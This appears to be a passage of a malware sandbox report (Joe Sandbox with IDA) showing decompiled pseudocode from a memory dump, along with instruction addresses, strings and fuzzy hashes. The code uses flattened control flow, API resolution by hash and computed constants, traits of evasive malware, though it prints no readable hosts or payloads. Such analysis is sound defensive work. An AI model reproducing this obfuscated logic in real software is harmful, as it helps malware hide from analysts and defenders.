								_t164 = 0x194519ad;
								continue;
							}
						}
						L32:
					}
					if(_t179 == 0) {
						_t84 =  *0x29ce024;
						if(_t84 == 0) {
							_t84 = E029C3E80(_t117, E029C3F20(0xbb398380), 0x5262aefc, _t172);
							 *0x29ce024 = _t84;
						}
						_t85 =  *_t84(_t177 + 0x30);
						_t147 =  *0x29ce194;
						 *((intOrPtr*)(_t177 + 0x2c)) = 2 + _t85 * 2;
						if(_t147 == 0) {
							_t147 = E029C3E80(_t117, E029C3F20(0x667fdee), 0x1595373a, _t172);
							 *0x29ce194 = _t147;
						}
						_t89 =  *_t147( *((intOrPtr*)(_t177 + 0x3c)), _t158,  *(_t177 + 0x18),  *((intOrPtr*)(_t177 + 0x20)), _t177 + 0x30,  *((intOrPtr*)(_t177 + 0x2c)));
						_t164 = 0x1ff1a285;
						asm("sbb ebp, ebp");
						_t172 =  ~_t89 + 1;
						goto L1;
					} else {
						if(_t164 == 0x194519ad) {
							_t166 = E029C34C0(0x29cd8f0);
							_t91 =  *0x29cdc60;
							if(_t91 == 0) {
								_t91 = E029C3E80(_t117, E029C3F20(0xe66945e6), 0xcca28b0d, _t172);
								 *0x29cdc60 = _t91;
							}
							_t149 =  *0x29ce2ec;
							 *_t91(_t177 + 0x3c, 0x104, _t166, _t149 + 0x5c, _t149 + 0x278);
							_t93 =  *0x29cdea8;
							_t177 = _t177 + 0x14;
							if(_t93 == 0) {
								_t93 = E029C3E80(_t117, E029C3F20(0xbb398380), 0x97f883e, _t172);
								 *0x29cdea8 = _t93;
							}
							_t117 =  *_t93();
							_t95 =  *0x29ce1a0;
							if(_t95 == 0) {
								_t95 = E029C3E80(_t117, E029C3F20(0xbb398380), 0x26c3f343, _t172);
								 *0x29ce1a0 = _t95;
							}
							 *_t95(_t117, 0, _t166);
							_t164 = 0x342fd613;
							goto L1;
						} else {
							if(_t164 == 0x1ff1a285) {
								_t97 =  *0x29cdfc4; // 0x0
								if(_t97 == 0) {
									_t97 = E029C3E80(_t117, E029C3F20(0x667fdee), 0x217c84a0, _t172);
									 *0x29cdfc4 = _t97;
								}
								 *_t97( *((intOrPtr*)(_t177 + 0x28)));
								return _t172;
							} else {
								if(_t164 == 0x2685696e) {
									_t101 = E029C34C0(0x29cd960);
									_t152 =  *0x29cdbec; // 0x0
									_t117 = _t101;
									if(_t152 == 0) {
										_t152 = E029C3E80(_t117, E029C3F20(0x667fdee), 0x7aac94ee, _t172);
										 *0x29cdbec = _t152;
									}
									_t106 =  *_t152( *((intOrPtr*)(_t177 + 0x40)), _t117,  *((intOrPtr*)(_t177 + 0x34)), 0,  *(_t177 + 0x1c),  *(_t177 + 0x18), 0, _t177 + 0x28, 0);
									asm("sbb esi, esi");
									_t164 = ( ~_t106 & 0x09cffb0d) + 0x2d3069ff;
									E029C3460(_t117);
								}
								goto L9;
							}
						}
					}
					goto L32;
					L9:
				} while (_t164 != 0x3700650c);
				return _t172;
				goto L32;
			}

0x029c7746
0x029c774e
0x029c7756
0x029c775e
0x029c7766
0x029c776b
0x029c7773
0x029c7780
0x029c7784
0x029c7788
0x029c778a
0x029c778f
0x029c7794
0x029c779c
0x029c77a8
0x029c77b1
0x029c77b9
0x029c77c1
0x029c77c9
0x029c77d1
0x029c77d9
0x029c77e1
0x029c77e9
0x029c77f4
0x029c77fa
0x029c77fe
0x029c780b
0x029c780f
0x029c7813
0x029c7818
0x029c7820
0x029c7828
0x029c782c
0x029c7834
0x029c7834
0x029c7840
0x029c7840
0x029c7840
0x029c7840
0x029c7846
0x00000000
0x00000000
0x029c7a37
0x029c7a55
0x029c7a5f
0x029c7a61
0x029c7a64
0x029c7a6a
0x029c7a6d
0x00000000
0x029c7a39
0x029c7a3f
0x00000000
0x029c7a45
0x029c7a45
0x00000000
0x029c7a45
0x029c7a3f
0x00000000
0x029c7a37
0x029c784c
0x029c79a7
0x029c79ae
0x029c79c1
0x029c79c6
0x029c79c6
0x029c79d0
0x029c79d2
0x029c79df
0x029c79e5
0x029c79fd
0x029c79ff
0x029c79ff
0x029c7a1e
0x029c7a22
0x029c7a29
0x029c7a2b
0x00000000
0x029c7852
0x029c7858
0x029c7904
0x029c7906
0x029c790d
0x029c7920
0x029c7925
0x029c7925
0x029c792a
0x029c7946
0x029c7948
0x029c794d
0x029c7952
0x029c7965
0x029c796a
0x029c796a
0x029c7971
0x029c7973
0x029c797a
0x029c798d
0x029c7992
0x029c7992
0x029c799b
0x029c799d
0x00000000
0x029c785e
0x029c7864
0x029c7a77
0x029c7a7e
0x029c7a91
0x029c7a96
0x029c7a96
0x029c7a9f
0x029c7aad
0x029c786a
0x029c7870
0x029c7877
0x029c787c
0x029c7882
0x029c7886
0x029c789e
0x029c78a0
0x029c78a0
0x029c78c6
0x029c78ce
0x029c78d6
0x029c78dc
0x029c78dc
0x00000000
0x029c7870
0x029c7864
0x029c7858
0x00000000
0x029c78e1
0x029c78e1
0x029c78f9
0x00000000

Strings

Ei, xrefs: 029C790F
"-, xrefs: 029C782C
z}, xrefs: 029C7773
t<C7, xrefs: 029C7A39
t<C7, xrefs: 029C778F

Memory Dump Source

Source File: 00000000.00000002.249838612.00000000029C1000.00000020.00000001.sdmp, Offset: 029C0000, based on PE: true

Associated: 00000000.00000002.249823573.00000000029C0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249848856.00000000029CD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.249854417.00000000029D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_29c0000_0TOEtGJHN8.jbxd

Yara matches

Similarity

API ID:
String ID: "-$t<C7$t<C7$z}$Ei
API String ID: 0-1832362217
Opcode ID: 72cc0a9ab996d6cf98fa92cc1882cc7b33d3322c49895de219f3b946e8b53765
Instruction ID: 5f3b4d6ff42d3045e6631029087ed7334758a390285f52d16d4170c14143bcab
Opcode Fuzzy Hash: 72cc0a9ab996d6cf98fa92cc1882cc7b33d3322c49895de219f3b946e8b53765
Instruction Fuzzy Hash: DB81C371A083019FD354EFA8D844AABB7E9ABC4344F208D2DF49697244E770DA09CF93

Uniqueness

Uniqueness Score: -1.00%

Function 029C6530, Relevance: 5.6, Strings: 4, Instructions: 596
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E029C6530(void* __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				char _v76;
				signed int _v80;
				char _v88;
				char _v96;
				char _v100;
				char _v104;
				char _v112;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ebx;
				void* __ebp;
				void* _t198;
				void* _t200;
				signed int _t207;
				signed int _t209;
				signed int _t214;
				signed int _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				intOrPtr* _t227;
				signed int _t228;
				void* _t229;
				void* _t230;
				signed int _t234;
				signed int _t236;
				void* _t237;
				signed int _t240;
				intOrPtr* _t241;
				signed int _t242;
				void* _t243;
				void* _t244;
				signed int _t249;
				void* _t254;
				signed int _t255;
				intOrPtr* _t256;
				void* _t257;
				intOrPtr* _t258;
				signed int _t259;
				void* _t260;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t280;
				signed int _t285;
				intOrPtr* _t287;
				signed int _t293;
				signed int _t300;
				signed int _t304;
				intOrPtr _t308;
				signed int _t318;
				signed int _t347;
				signed int _t348;
				signed int _t369;
				signed int _t371;
				void* _t375;
				signed int _t385;
				signed int _t391;
				signed int _t396;
				void* _t398;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;

				_t398 = (_t396 & 0xfffffff8) - 0x80;
				_t300 = _v120;
				_t191 = 0x12823d32;
				_t391 = _v124;
				while(1) {
					L1:
					_t375 = 0x2564be4f;
					do {
						while(1) {
							L2:
							_t400 = _t191 - 0x1ff46034;
							if(_t400 > 0) {
								goto L60;
							}
							L3:
							if(_t400 == 0) {
								return E029CB160();
							} else {
								_t401 = _t191 - 0xfd5a1ac;
								if(_t401 > 0) {
									__eflags = _t191 - 0x16bf64f2;
									if(__eflags > 0) {
										__eflags = _t191 - 0x1ea773fc;
										if(__eflags > 0) {
											__eflags = _t191 - 0x1fdef138;
											if(_t191 != 0x1fdef138) {
												break;
											} else {
												_v8 =  *((intOrPtr*)( *0x29ce2ec + 0x48));
												_t191 = 0x1ea773fc;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_v40 = E029C5360(_t300, _t391);
												_t191 = 0x216a974b;
												continue;
											} else {
												__eflags = _t191 - 0x1c32e2d2;
												if(_t191 == 0x1c32e2d2) {
													E029C4250(_t300, _v112);
													_t191 = 0x39deb3f9;
													continue;
												} else {
													__eflags = _t191 - 0x1c5e7f9f;
													if(_t191 != 0x1c5e7f9f) {
														break;
													} else {
														_t191 = 0x30d1bd42;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t272 = E029C5F60( &_v76, _t347, _t391);
											__eflags = _t272;
											if(_t272 == 0) {
												L77:
												_t191 = 0x1ff46034;
											} else {
												_v48 =  &_v76;
												_t274 =  *0x29ce144;
												__eflags = _t274;
												if(_t274 == 0) {
													_t276 = E029C3F20(0xbb398380);
													_t347 = 0x5262aeca;
													_t274 = E029C3E80(_t300, _t276, 0x5262aeca, _t391);
													 *0x29ce144 = _t274;
												}
												_t327 =  &_v76;
												_v48 =  *_t274( &_v76);
												_t191 = 0x1fdef138;
											}
											continue;
										} else {
											__eflags = _t191 - 0x14860a92;
											if(__eflags > 0) {
												__eflags = _t191 - 0x166b1152;
												if(_t191 != 0x166b1152) {
													break;
												} else {
													E029C8EA0();
													_t191 = 0x1381dc55;
													continue;
												}
											} else {
												if(__eflags == 0) {
													E029C8550(_t300);
													_t191 = 0x2aa5d516;
													continue;
												} else {
													__eflags = _t191 - 0x12823d32;
													if(_t191 == 0x12823d32) {
														_t191 = 0x27047861;
														continue;
													} else {
														__eflags = _t191 - 0x1381dc55;
														if(_t191 != 0x1381dc55) {
															break;
														} else {
															E029C9470(_t391);
															_t191 = 0x315a7589;
															continue;
														}
													}
												}
											}
										}
									}
								} else {
									if(_t401 == 0) {
										_t280 = E029C90C0();
										asm("sbb eax, eax");
										_t191 = ( ~_t280 & 0x0810ea45) + 0xb70f210;
										continue;
									} else {
										_t402 = _t191 - 0xd28318f;
										if(_t402 > 0) {
											__eflags = _t191 - 0xe9d6a0f;
											if(__eflags > 0) {
												__eflags = _t191 - 0xf0c159c;
												if(_t191 != 0xf0c159c) {
													break;
												} else {
													_t209 = E029C96B0();
													__eflags = _t209;
													if(_t209 == 0) {
														L142:
														return _t209;
													} else {
														_t191 = 0xfd5a1ac;
														continue;
													}
												}
											} else {
												if(__eflags == 0) {
													E029C7EC0();
													__eflags =  *( *0x29ce2ec + 0x268);
													_t191 =  !=  ? 0x21c0adc4 : 0x14860a92;
													continue;
												} else {
													__eflags = _t191 - 0xddcb99d;
													if(_t191 == 0xddcb99d) {
														_t285 = E029CB2B0( &_v88, _t391);
														__eflags = _t285;
														if(_t285 != 0) {
															asm("xorps xmm0, xmm0");
															_t391 = 0x8e1a01c;
															asm("movlpd [esp+0x18], xmm0");
															_t300 = _v120;
														}
														L30:
														_t191 = 0xa28b6e5;
														continue;
													} else {
														__eflags = _t191 - 0xe0d6cd8;
														if(_t191 != 0xe0d6cd8) {
															break;
														} else {
															E029C9D70(_t300);
															_t347 = 0xcfd93ac1;
															_t391 = 0x1c5e7f9f;
															_t287 = E029C4190(_t300, 0xbb398380, 0xcfd93ac1, 0x1c5e7f9f, 0xcf);
															_t398 = _t398 + 4;
															 *_t287();
															_t300 = 0xcfd93ac1;
															L27:
															_t191 = 0x2537e9de;
															continue;
														}
													}
												}
											}
										} else {
											if(_t402 == 0) {
												_v124 = 0x669c;
												_t347 = 0xcccccccd * _v124 >> 0x20 >> 5;
												_v124 = _t347;
												_v124 = _v124 ^ 0x00000178;
												_v28 = _v124;
												_t191 = 0x8e1a01c;
												continue;
											} else {
												_t403 = _t191 - 0x8e1a01c;
												if(_t403 > 0) {
													__eflags = _t191 - 0xa28b6e5;
													if(_t191 == 0xa28b6e5) {
														E029C4250(_t300, _v96);
														_t191 = 0x1c32e2d2;
														continue;
													} else {
														__eflags = _t191 - 0xb70f210;
														if(_t191 != 0xb70f210) {
															break;
														} else {
															_t293 = E029C8240(_t300, _t391);
															_t308 =  *0x29ce2ec;
															__eflags = _t293;
															if(_t293 == 0) {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? 0x3278b521 : 0x166b1152;
															} else {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? _t375 : 0xe0d6cd8;
															}
															continue;
														}
													}
												} else {
													if(_t403 == 0) {
														E029C60E0( &_v24);
														_t191 = 0x4326e25;
														while(1) {
															L2:
															_t400 = _t191 - 0x1ff46034;
															if(_t400 > 0) {
																goto L60;
															}
															goto L3;
														}
														goto L60;
													} else {
														if(_t191 == 0x2c8787f) {
															E029C8530();
															_t191 = 0xddcb99d;
															while(1) {
																L2:
																_t400 = _t191 - 0x1ff46034;
																if(_t400 > 0) {
																	goto L60;
																}
																goto L3;
															}
														} else {
															if(_t191 != 0x4326e25) {
																break;
															} else {
																E029CB050( &_v16);
																_t191 = 0x2b42ebb2;
																while(1) {
																	L2:
																	_t400 = _t191 - 0x1ff46034;
																	if(_t400 > 0) {
																		goto L60;
																	}
																	goto L3;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							L143:
							L60:
							__eflags = _t191 - 0x2b42ebb2;
							if(__eflags > 0) {
								__eflags = _t191 - 0x3299e430;
								if(__eflags > 0) {
									__eflags = _t191 - 0x39deb3f9;
									if(__eflags > 0) {
										__eflags = _t191 - 0x39f8f5db;
										if(_t191 != 0x39f8f5db) {
											break;
										} else {
											_v124 = 0xaaf5;
											_t391 = 0x16bf64f2;
											_v124 = _v124 >> 3;
											_v124 = _v124 + 0xffff9253;
											_v124 = _v124 ^ 0xffff9931;
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											_t157 =  &_v128; // 0x7560216c
											__eflags = _v124 -  *_t157;
											if(_v124 <=  *_t157) {
												__eflags = 0;
											} else {
												_t348 =  *0x29cdd4c;
												__eflags = _t348;
												if(_t348 == 0) {
													_t348 = E029C3E80(_t300, E029C3F20(0xbb398380), 0xae3c1a47, 0x16bf64f2);
													 *0x29cdd4c = _t348;
												}
												_v124 = 0xaaf5;
												_v124 = _v124 >> 3;
												_v124 = _v124 + 0xffff9253;
												_v124 = _v124 ^ 0xffff9931;
												_t200 = E029C5E10();
												_t347 =  *_t348() % (_v124 - _t200);
											}
											_t318 =  *0x29cddbc; // 0x0
											__eflags = _t318;
											if(_t318 == 0) {
												_t198 = E029C3F20(0xbb398380);
												_t347 = 0xcfd93ac1;
												_t318 = E029C3E80(_t300, _t198, 0xcfd93ac1, _t391);
												 *0x29cddbc = _t318;
											}
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											 *_t318();
											_t300 = _t347;
											_t191 = 0x2537e9de;
											asm("adc ebx, 0x0");
											goto L1;
										}
									} else {
										if(__eflags == 0) {
											E029C4250(_t300, _v16);
											_t191 = 0x3540656b;
											continue;
										} else {
											__eflags = _t191 - 0x3540656b;
											if(_t191 == 0x3540656b) {
												E029C4250(_t300, _v24);
												_t191 = 0x2537e9de;
												continue;
											} else {
												__eflags = _t191 - 0x380a1784;
												if(_t191 != 0x380a1784) {
													break;
												} else {
													_t347 =  &_v88;
													_t207 = E029C74E0( &_v96, _t347);
													__eflags = _t207;
													if(_t207 == 0) {
														goto L30;
													} else {
														E029CAE60(0);
														_t327 = _v80;
														_t191 = 0x2c8787f;
														__eflags = _t327;
														if(_t327 != 0) {
															__eflags = _t327 - 7;
															_t327 = 0x3299e430;
															_t191 =  ==  ? 0x3299e430 : 0x2c8787f;
														}
													}
													continue;
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										_t209 = E029C8590(_t391);
										goto L142;
									} else {
										__eflags = _t191 - 0x315a7589;
										if(__eflags > 0) {
											__eflags = _t191 - 0x3278b521;
											if(_t191 != 0x3278b521) {
												break;
											} else {
												E029C8CD0();
												_t191 = 0x166b1152;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_t209 = E029C8A10();
												__eflags = _t209;
												if(_t209 == 0) {
													goto L142;
												} else {
													_t191 = 0xe9d6a0f;
													continue;
												}
											} else {
												__eflags = _t191 - 0x30d1bd42;
												if(_t191 == 0x30d1bd42) {
													_t347 =  &_v100;
													_v104 = E029C3310(0x29cd2e0, _t347);
													E029C1890( &_v104);
													E029C3460(_t211);
													_t191 = 0x314203dc;
													while(1) {
														L1:
														_t375 = 0x2564be4f;
														goto L2;
													}
												} else {
													__eflags = _t191 - 0x314203dc;
													if(_t191 != 0x314203dc) {
														break;
													} else {
														_t191 = 0x39f8f5db;
														continue;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									_t347 =  &_v112;
									_t327 =  &_v48;
									_t214 = E029C72A0( &_v48, _t347);
									asm("sbb eax, eax");
									_t191 = ( ~_t214 & 0xf0f0f5bd) + 0x39deb3f9;
									continue;
								} else {
									__eflags = _t191 - 0x2564be4f;
									if(__eflags > 0) {
										__eflags = _t191 - 0x2aa5d516;
										if(__eflags > 0) {
											__eflags = _t191 - 0x2acfa9b6;
											if(_t191 != 0x2acfa9b6) {
												break;
											} else {
												_v128 = 0xe36c;
												_t347 =  &_v112;
												_v128 = _v128 * 0x71;
												_v128 = _v128 + 0xffff86a2;
												_v128 = _v128 * 0x7b;
												_v128 = _v128 >> 6;
												_v128 = _v128 | 0x57610b65;
												_v128 = _v128 ^ 0x57e10f64;
												_t220 = E029C12B0(_v128, _t347,  &_v96);
												_t398 = _t398 + 4;
												__eflags = _t220;
												if(_t220 == 0) {
													_t327 =  *0x29ce2e0;
													 *(_t327 + 0xc) =  &(( *(_t327 + 0xc))[2]);
													__eflags =  *( *(_t327 + 0xc));
													if( *( *(_t327 + 0xc)) == 0) {
														 *(_t327 + 0xc) =  *(_t327 + 8);
													}
													_v128 = 0xc5a1;
													_t391 = 0x8e1a01c;
													_v128 = _v128 ^ 0xe0738efa;
													_v128 = _v128 >> 6;
													_v128 = _v128 + 0xffffe737;
													_v128 = _v128 ^ 0x0381bbc4;
													_t222 = E029C5D50();
													__eflags = _v128 - _t222;
													if(_v128 <= _t222) {
														_t304 = 0;
														__eflags = 0;
													} else {
														_t227 = E029C4190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t228 =  *_t227();
														_t229 = E029C5D50();
														_t230 = E029C5D20();
														_t327 = _t230 - _t229;
														_t347 = _t228 % (_t230 - _t229);
														_t304 = _t347;
													}
													_t369 =  *0x29cddbc; // 0x0
													__eflags = _t369;
													if(_t369 == 0) {
														_t225 = E029C3F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t225;
														_t369 = E029C3E80(_t304, _t225, 0xcfd93ac1, _t391);
														 *0x29cddbc = _t369;
													}
													_t223 = E029C5D50();
													_t224 =  *_t369();
													_t300 = _t347;
													_t371 = _t224 + _t304 + _t223;
													_t191 = 0x1c32e2d2;
													asm("adc ebx, 0x0");
												} else {
													_v124 = 0xb2e0;
													_t391 = 0x8e1a01c;
													_t234 = _v124;
													_t327 = (_t234 << 4) - _t234 << 2;
													_v124 = (_t234 << 4) - _t234 << 2;
													_v124 = _v124 ^ 0x00245720;
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													__eflags = _v124 - _v128;
													if(_v124 <= _v128) {
														_t385 = 0;
														__eflags = 0;
													} else {
														_t241 = E029C4190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t242 =  *_t241();
														_t243 = E029C5DC0();
														_t244 = E029C5D90();
														_t327 = _t244 - _t243;
														_t347 = _t242 % (_t244 - _t243);
														_t385 = _t347;
													}
													_t236 =  *0x29cddbc; // 0x0
													__eflags = _t236;
													if(_t236 == 0) {
														_t240 = E029C3F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t240;
														_t236 = E029C3E80(_t300, _t240, 0xcfd93ac1, _t391);
														 *0x29cddbc = _t236;
													}
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													_t237 =  *_t236();
													_t300 = _t347;
													_t371 = _t237 + _v128 + _t385;
													_t191 = 0x380a1784;
													asm("adc ebx, 0x0");
												}
												while(1) {
													L1:
													_t375 = 0x2564be4f;
													goto L2;
												}
											}
										} else {
											if(__eflags == 0) {
												return E029C8BA0(_t327, _t391);
											} else {
												__eflags = _t191 - 0x27047861;
												if(_t191 == 0x27047861) {
													_t209 = E029C7160(_t300);
													__eflags = _t209;
													if(_t209 == 0) {
														goto L142;
													} else {
														_t191 = 0x226f6c18;
														continue;
													}
												} else {
													__eflags = _t191 - 0x27dc0a4c;
													if(_t191 != 0x27dc0a4c) {
														break;
													} else {
														_v32 = E029C5EA0();
														_t191 = 0xd28318f;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t249 = E029C9320(_t391);
											asm("sbb eax, eax");
											_t191 = ( ~_t249 & 0x1c98683e) + 0xe0d6cd8;
											continue;
										} else {
											__eflags = _t191 - 0x226f6c18;
											if(__eflags > 0) {
												__eflags = _t191 - 0x2537e9de;
												if(_t191 != 0x2537e9de) {
													break;
												} else {
													__eflags = _t371 | _t300;
													if((_t371 | _t300) == 0) {
														L81:
														_t191 = _t391;
														break;
													} else {
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t254 = E029C5CD0();
														__eflags = _t254 - _v128;
														if(_t254 <= _v128) {
															_t347 = 0;
															__eflags = 0;
														} else {
															_t258 = E029C4190(_t300, 0xbb398380, 0xae3c1a47, _t391, 0xb3);
															_t398 = _t398 + 4;
															_t259 =  *_t258();
															_t260 = E029C5CD0();
															_t347 = _t259 % (_t260 - E029C5D00());
															_t375 = 0x2564be4f;
														}
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t327 = _v128 + _t347;
														_t255 = E029C9EA0(_t300, _v128 + _t347);
														__eflags = _t255;
														if(_t255 == 0) {
															_t347 = 0xcfd93ac1;
															_t327 = 0xbb398380;
															_t256 = E029C4190(_t300, 0xbb398380, 0xcfd93ac1, _t391, 0xcf);
															_t398 = _t398 + 4;
															_t257 =  *_t256();
															__eflags = 0xcfd93ac1 - _t300;
															if(__eflags < 0) {
																goto L27;
															} else {
																if(__eflags > 0) {
																	goto L81;
																} else {
																	__eflags = _t257 - _t371;
																	if(_t257 < _t371) {
																		goto L27;
																	} else {
																		goto L81;
																	}
																}
															}
														} else {
															goto L77;
														}
													}
												}
											} else {
												if(__eflags == 0) {
													E029C6FB0(_t300);
													_t191 = 0xf0c159c;
													continue;
												} else {
													__eflags = _t191 - 0x216a974b;
													if(_t191 == 0x216a974b) {
														_v36 = E029C47A0(_t300, _t391);
														_t191 = 0x27dc0a4c;
														continue;
													} else {
														__eflags = _t191 - 0x21c0adc4;
														if(_t191 != 0x21c0adc4) {
															break;
														} else {
															E029C87D0();
															_t191 = 0x14860a92;
															continue;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L143;
						}
						__eflags = _t191 - 0x33f417f9;
					} while (_t191 != 0x33f417f9);
					return _t191;
					goto L143;
				}
			}

0x029c6536
0x029c653d
0x029c6541
0x029c6547
0x029c6551
0x029c6551
0x029c6551
0x029c6560
0x029c6560
0x029c6560
0x029c6560
0x029c6565
0x00000000
0x00000000
0x029c656b
0x029c656b
0x029c6ef5
0x029c6571
0x029c6571
0x029c6576
0x029c674d
0x029c6752
0x029c6809
0x029c680e
0x029c6854
0x029c6859
0x00000000
0x029c685f
0x029c6867
0x029c686e
0x00000000
0x029c686e
0x029c6810
0x029c6810
0x029c6846
0x029c684a
0x00000000
0x029c6812
0x029c6812
0x029c6817
0x029c6832
0x029c6837
0x00000000
0x029c6819
0x029c6819
0x029c681e
0x00000000
0x029c6824
0x029c6824
0x00000000
0x029c6824
0x029c681e
0x029c6817
0x029c6810
0x029c6758
0x029c6758
0x029c67bb
0x029c67c0
0x029c67c2
0x029c6987
0x029c6987
0x029c67c8
0x029c67cc
0x029c67d0
0x029c67d5
0x029c67d7
0x029c67de
0x029c67e3
0x029c67ea
0x029c67ef
0x029c67ef
0x029c67f4
0x029c67fb
0x029c67ff
0x029c67ff
0x00000000
0x029c675a
0x029c675a
0x029c675f
0x029c679d
0x029c67a2
0x00000000
0x029c67a8
0x029c67a8
0x029c67ad
0x00000000
0x029c67ad
0x029c6761
0x029c6761
0x029c678e
0x029c6793
0x00000000
0x029c6763
0x029c6763
0x029c6768
0x029c6784
0x00000000
0x029c676a
0x029c676a
0x029c676f
0x00000000
0x029c6775
0x029c6775
0x029c677a
0x00000000
0x029c677a
0x029c676f
0x029c6768
0x029c6761
0x029c675f
0x029c6758
0x029c657c
0x029c657c
0x029c6735
0x029c673c
0x029c6743
0x00000000
0x029c6582
0x029c6582
0x029c6587
0x029c6672
0x029c6677
0x029c6713
0x029c6718
0x00000000
0x029c671e
0x029c671e
0x029c6723
0x029c6725
0x029c6f08
0x029c6f0f
0x029c672b
0x029c672b
0x00000000
0x029c672b
0x029c6725
0x029c667d
0x029c667d
0x029c66ef
0x029c66ff
0x029c670b
0x00000000
0x029c667f
0x029c667f
0x029c6684
0x029c66c6
0x029c66cb
0x029c66cd
0x029c66cf
0x029c66d2
0x029c66d7
0x029c66dd
0x029c66e1
0x029c66e5
0x029c66e5
0x00000000
0x029c6686
0x029c6686
0x029c668b
0x00000000
0x029c6691
0x029c6691
0x029c669b
0x029c66a5
0x029c66aa
0x029c66af
0x029c66b2
0x029c66b6
0x029c66b8
0x029c66b8
0x00000000
0x029c66b8
0x029c668b
0x029c6684
0x029c667d
0x029c658d
0x029c658d
0x029c663e
0x029c6651
0x029c6654
0x029c6658
0x029c6664
0x029c6668
0x00000000
0x029c6593
0x029c6593
0x029c6598
0x029c65dd
0x029c65e2
0x029c662f
0x029c6634
0x00000000
0x029c65e4
0x029c65e4
0x029c65e9
0x00000000
0x029c65ef
0x029c65ef
0x029c65f4
0x029c65fa
0x029c65fc
0x029c6612
0x029c6623
0x029c65fe
0x029c65fe
0x029c660a
0x029c660a
0x00000000
0x029c65fc
0x029c65e9
0x029c659a
0x029c659a
0x029c65d1
0x029c65d6
0x029c6560
0x029c6560
0x029c6560
0x029c6565
0x00000000
0x00000000
0x00000000
0x029c6565
0x00000000
0x029c659c
0x029c65a1
0x029c65c1
0x029c65c6
0x029c6560
0x029c6560
0x029c6560
0x029c6565
0x00000000
0x00000000
0x00000000
0x029c6565
0x029c65a3
0x029c65a8
0x00000000
0x029c65ae
0x029c65b5
0x029c65ba
0x029c6560
0x029c6560
0x029c6560
0x029c6565
0x00000000
0x00000000
0x00000000
0x029c6565
0x029c6560
0x029c65a8
0x029c65a1
0x029c659a
0x029c6598
0x029c658d
0x029c6587
0x029c657c
0x029c6576
0x00000000
0x029c6878
0x029c6878
0x029c687d
0x029c6c63
0x029c6c68
0x029c6cf8
0x029c6cfd
0x029c6d79
0x029c6d7e
0x00000000
0x029c6d84
0x029c6d84
0x029c6d8c
0x029c6d91
0x029c6d96
0x029c6d9e
0x029c6da6
0x029c6dae
0x029c6db6
0x029c6dbe
0x029c6dc6
0x029c6dce
0x029c6dd6
0x029c6de6
0x029c6deb
0x029c6df3
0x029c6df7
0x029c6dfb
0x029c6e57
0x029c6dfd
0x029c6dfd
0x029c6e03
0x029c6e05
0x029c6e1d
0x029c6e1f
0x029c6e1f
0x029c6e25
0x029c6e2d
0x029c6e32
0x029c6e3a
0x029c6e42
0x029c6e51
0x029c6e53
0x029c6e59
0x029c6e5f
0x029c6e61
0x029c6e68
0x029c6e6d
0x029c6e79
0x029c6e7b
0x029c6e7b
0x029c6e81
0x029c6e89
0x029c6e91
0x029c6e99
0x029c6ea1
0x029c6ea9
0x029c6eb1
0x029c6ec1
0x029c6ec6
0x029c6ece
0x029c6ed2
0x029c6edc
0x029c6ee1
0x00000000
0x029c6ee1
0x029c6cff
0x029c6cff
0x029c6d6a
0x029c6d6f
0x00000000
0x029c6d01
0x029c6d01
0x029c6d06
0x029c6d54
0x029c6d59
0x00000000
0x029c6d08
0x029c6d08
0x029c6d0d
0x00000000
0x029c6d13
0x029c6d13
0x029c6d1b
0x029c6d20
0x029c6d22
0x00000000
0x029c6d28
0x029c6d2a
0x029c6d2f
0x029c6d33
0x029c6d38
0x029c6d3a
0x029c6d40
0x029c6d43
0x029c6d48
0x029c6d48
0x029c6d3a
0x00000000
0x029c6d22
0x029c6d0d
0x029c6d06
0x029c6cff
